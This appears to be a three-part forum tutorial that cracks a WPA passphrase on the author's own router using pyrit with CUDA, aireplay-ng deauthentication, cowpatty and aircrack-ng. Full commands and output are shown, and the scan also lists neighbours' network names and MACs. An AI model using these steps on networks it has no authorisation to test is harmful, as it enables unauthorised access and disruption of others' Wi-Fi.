pyrit CUDA nvidia Tutorial + Nvidia overclock instructions
OK so here we are with fresh new release and people lets be honest we want to see some thing new. Well this is one of bt4's new exiting features.
WPA hash Table Generation using CUDA/nvida GPU power.
First thing to do is check if your card is supported for this technology http://en.wikipedia.org/wiki/CUDA#Supported_GPUs
So lets get started....
I'm going to try to assume that if your reading this you have no clue what your doing so I will try to go from A -Z on this.
So lets boot our disk and when we get to the framebuffer console prompt (thats before you startx) we are going to install the nvidia kernel module.
Code:
root@bt:~# cd /opt/cuda/
root@bt:/opt/cuda# ls
CUDA_INSTALL cuda-set-env.sh nv_20090130-1_i386.deb
root@bt:/opt/cuda# bash CUDA_INSTALL
You will get some output and then you will be asked to overwrite your current xorg.conf. Take the default here which is no.
next lets install the driver
Code:
root@bt:~# modprobe nvidia
root@bt:~# depmod -a
ok so thats done. Now since we've totally borked our xorg.conf we should generate a new one.
Code:
root@bt:~# X -configure
That will save the new one in /root and we will have to copy it over by hand
Code:
root@bt:~# cp xorg.conf.new /etc/X11/xorg.conf
At this point we should be able to either startx or use the new bt4-crystal window manager. (shameless plug for me and j0rgan here)
OK so if every thing went well your are looking at your desktop.
Now before we get to cracking pyrit has a benchmark utility we can use to see if we are good to go.
Code:
root@bt:/pentest/password/pyrit# python pyrit.py benchmark
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
The ESSID-blobspace seems to be empty; you should create an ESSID...
Available cores: 'Standard CPU', 'Nvidia CUDA'
Testing CPU-only core 'Standard CPU' (4 CPUs)... 1294.58 PMKs/s
Testing GPU core 'Nvidia CUDA' (Device 'GeForce 8800 GT')... 5409.43 PMKs/s
As you can see my 8800gt is roughly 5 times faster that my Q6600 quad core chip running at 3.6 GHz
OK swell, so that works. Now what we need is a .cap file. I'm assuming every one can do this but I will show it anyway.
Code:
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~#airodump-ng -w cudacapture mon0
ok so lets do a little scan of my house.
http://img7.imageshack.us/img7/844/snapshot4fo4.th.png
As you can see I have 2 dd-wrt routers on at the moment and my wife is connected to ddwrt1 feeding her new facebook addiction.
Lets deauth her a$$
Code:
root@bt:~# aireplay-ng -0 10 -a 00:1d:7e:f0:a5:8f -c 00:13:02:a7:dd:53 mon0
01:13:28 Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
01:13:29 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
01:13:30 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
01:13:31 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:32 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:33 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
01:13:34 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:35 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:36 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
01:13:37 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
01:13:38 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
Now lets check for success
Code:
root@bt:~# aircrack-ng cudacapture-01.cap
Opening cudacapture-01.cap
Read 5612 packets.
# BSSID ESSID Encryption
1 00:1D:7E:F0:A5:8F ddwrt1 WPA (1 handshake)
2 00:1D:7E:64:9A:7C ddwrt2 WPA (0 handshake)
3 00:21:29:84:11:FD CookNet WEP (34 IVs)
4 00:0C:41:3E:2D:66 linksys None (192.168.1.1)
5 00:12:0E:7B:02:78 WEST7359 No data - WEP or WPA
6 00:1A:70:83:B0:1C linksys None (0.0.0.0)
7 00:13:46:44:A5:CE default WEP (11 IVs)
8 00:14:6C:F6:36:78 CBC None (0.0.0.0)
9 00:06:25:DB:3E:7B linksys None (0.0.0.0)
10 00:1B:2F:63:7C:50 PawsWithPurpose No data - WEP or WPA
11 00:21:29:9A:E6:3C Bigfoot No data - WEP or WPA
12 00:1C:10:89:16:76 linksys None (0.0.0.0)
Index number of target network ?
Looks like we got one.
I'm going to start a new post for part 2
pyrit CUDA nvidia Tutorial part 2
Okay so we got a hand shake now what?
First off we need to grab a dictionary file.
Code:
root@bt:~# wget http://www.outpost9.com/files/wordlists/dic-0294.zip
--2009-02-11 01:17:53-- http://www.outpost9.com/files/wordlists/dic-0294.zip
Resolving www.outpost9.com... 12.180.200.208
Connecting to www.outpost9.com|12.180.200.208|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3283473 (3.1M) [application/zip]
Saving to: `dic-0294.zip'
100%[=============================================================================================================>] 3,283,473 268K/s in 9.2
root@bt:~# unzip dic-0294.zip
Archive: dic-0294.zip
inflating: dic-0294.txt
Then we need to strip out the stuff we dont need.
Code:
root@bt:~# cat dic-0294.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.lst
root@bt:~# wc -l wpa.lst
597532 wpa.lst
So about six hundred thousand words.
Now we got a file to work with. Now for the fun part.
Code:
root@bt:~# cd /pentest/password/pyrit/
root@bt:/pentest/password/pyrit#
Add our essid
Code:
root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 create_essid
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Created ESSID 'ddwrt1'
Import our new wpa list
Code:
root@bt:/pentest/password/pyrit# python pyrit.py -f /root/wpa.lst import_passwords
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Importing from '/root/wpa.lst'
597532 lines read. All done.
And start the table generation
Code:
root@bt:/pentest/password/pyrit# python pyrit.py batchprocess
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Using default core 'Nvidia CUDA' (Device 'GeForce 8800 GT')
Working on ESSID 'ddwrt1'
Reading unit '1ec5841a057928e33972489b461cb914' (54072 passwords buffered)
All done, computed 54072 PMKs in 10.47 seconds, 5164.13 PMKs/s)
Reading unit '6c9303c848ed6a4473221229d4387934' (54996 passwords buffered)
All done, computed 54996 PMKs in 10.79 seconds, 5099.30 PMKs/s)
Reading unit '70ded804144475dbc58b982625483821' (56076 passwords buffered)
All done, computed 56076 PMKs in 10.74 seconds, 5223.29 PMKs/s)...
...Reading unit 'f384ca460307a079503db313ece6806e' (53808 passwords buffered)
All done, computed 53808 PMKs in 10.67 seconds, 5044.67 PMKs/s)
Reading unit '1bf464713cab79da5efc8503e8f28812' (17496 passwords buffered)
All done, computed 17496 PMKs in 3.23 seconds, 5422.30 PMKs/s)
Batchprocessing done.
So if everything went well you are at this point. Pyrit has the ability to output to cowpatty or airolib-ng files. For the sake of this tutorial I will be using cowpatty because I've found its faster.
So lets make our cowpatty file
Code:
root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f cow.out export_cowpatty
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Exporting to 'cow.out'...
4656218 entries written. All done.
Okay so lets see how fast this will go.
Code:
root@bt:~# cd /pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty/
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ls
AUTHORS COPYING cowpatty.h eap-test.dump fpga.c genpmk.c Makefile md5.o sha1.c TODO utils.o
CHANGELOG cowpatty cowpatty.o FAQ fpga.o genpmk.o md5.c radiotap.h sha1.h utils.c wpa2psk-linksys.dump
common.h cowpatty.c dict file_magic genpmk INSTALL md5.h README sha1.o utils.h wpapsk-linksys.dump
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty
cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
cowpatty: Must supply a list of passphrases in a file with -f or a hash file
with -d. Use "-f -" to accept words on stdin.
Usage: cowpatty [options]
-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-F card Use FPGA acceleration
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -d /pentest/password/pyrit/cow.out -s ddwrt2 -r /root/cudacapture-01.cap
cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: Mathboldit1
key no. 2000: llegando2
key no. 3000: shougakukan123
key no. 4000: DISGUISING
key no. 5000: Graffaloy
key no. 6000: Passibleness123
key no. 7000: Unmaking2
key no. 8000: Procanal123
So this is the cracking proccess.......
Code:
[4656217 passphrases tested in 24.84 seconds: 187468.86 passphrases/second
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty#
And Just to show you what it would be like with out the hash file..
Code:
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -f /root/wpa.lst -s ddwrt2 -r /root/cudacapture-01.cap
27824 passphrases tested in 84.98 seconds: 327.40 passphrases/second
Thats a HUGE difference
pyrit CUDA nvidia Tutorial part 3
So you would rather use rather use the airolib-ng option because you love aircrack. That can be done as well like this..
Back up to right before we created the cow.out table and use these commands instead.
create the database (pyrit wont do it for you for some reason)
Code:
[root@bt:/pentest/password/pyrit# airolib-ng testdb -import essid ddwrt1
Database <testdb> does not already exist, creating it...
Database <testdb> sucessfully created
Could not open file/stream for reading.
Then output to our newly created database.
Code:
[root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f testdb export_hashdb
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Exporting ESSID 'ddwrt1'
Okay.. this takes a little longer than the cowpatty tables due to sql stuff but the advantage to airolib-ng is it can use HUGE files while I think cowpatty fails with hash files over 2 gigs.
Once its done we can use aircrack
Code:
root@bt:/pentest/password/pyrit# aircrack-ng -r testdb /root/cudacapture-01.cap
Opening /root/cudacapture-01.cap
Read 10561 packets.
# BSSID ESSID Encryption
1 00:1D:7E:F0:A5:8F ddwrt1 WPA (1 handshake)
2 00:1D:7E:64:9A:7C ddwrt2 WPA (0 handshake)
3 00:21:29:84:11:FD CookNet WEP (93 IVs)
4 00:0C:41:3E:2D:66 linksys None (192.168.1.1)
5 00:12:0E:7B:02:78 WEST7359 No data - WEP or WPA
6 00:1A:70:83:B0:1C linksys None (192.168.1.1)
7 00:13:46:44:A5:CE default WEP (28 IVs)
8 00:14:6C:F6:36:78 CBC None (0.0.0.0)
9 00:06:25:DB:3E:7B linksys None (0.0.0.0)
10 00:1B:2F:63:7C:50 PawsWithPurpose No data - WEP or WPA
11 00:21:29:9A:E6:3C Bigfoot No data - WEP or WPA
12 00:1C:10:89:16:76 linksys None (0.0.0.0)
13 00:18:3A:3A:B2:B5 No data - WEP or WPA
14 00:12:0E:6E:FE:6B WEST3306 No data - WEP or WPA
Index number of target network ? 1
Select the network and let her rip
Code:
Aircrack-ng 1.0 rc2 r1385
[00:00:38] 4315315 keys tested (112595.70 k/s)
KEY FOUND! [ metasploit ]
Master Key : F4 AB C6 2A 18 F8 89 9B 6A 70 3D 5F EB 0D F4 F9
F8 F8 51 48 25 3E C3 61 EA 54 17 3D D3 84 18 AC
Transient Key : 11 A0 36 8F 96 63 64 7F 63 A1 08 35 73 82 96 AE
49 E1 BE 68 F7 7E 8D 98 57 28 C2 E1 DE AC F2 AC
68 00 43 B9 88 8E 96 57 7A BF E2 62 DB DE 6A 1B
BF 53 10 26 D1 D8 32 47 BC A6 F5 86 F1 83 23 11
EAPOL HMAC : 68 AE A8 82 57 7C 3D 89 6E BC BD C1 46 8E 34 AD
Quitting aircrack-ng...
Well Thats IT! Thanks for Listening/Reading
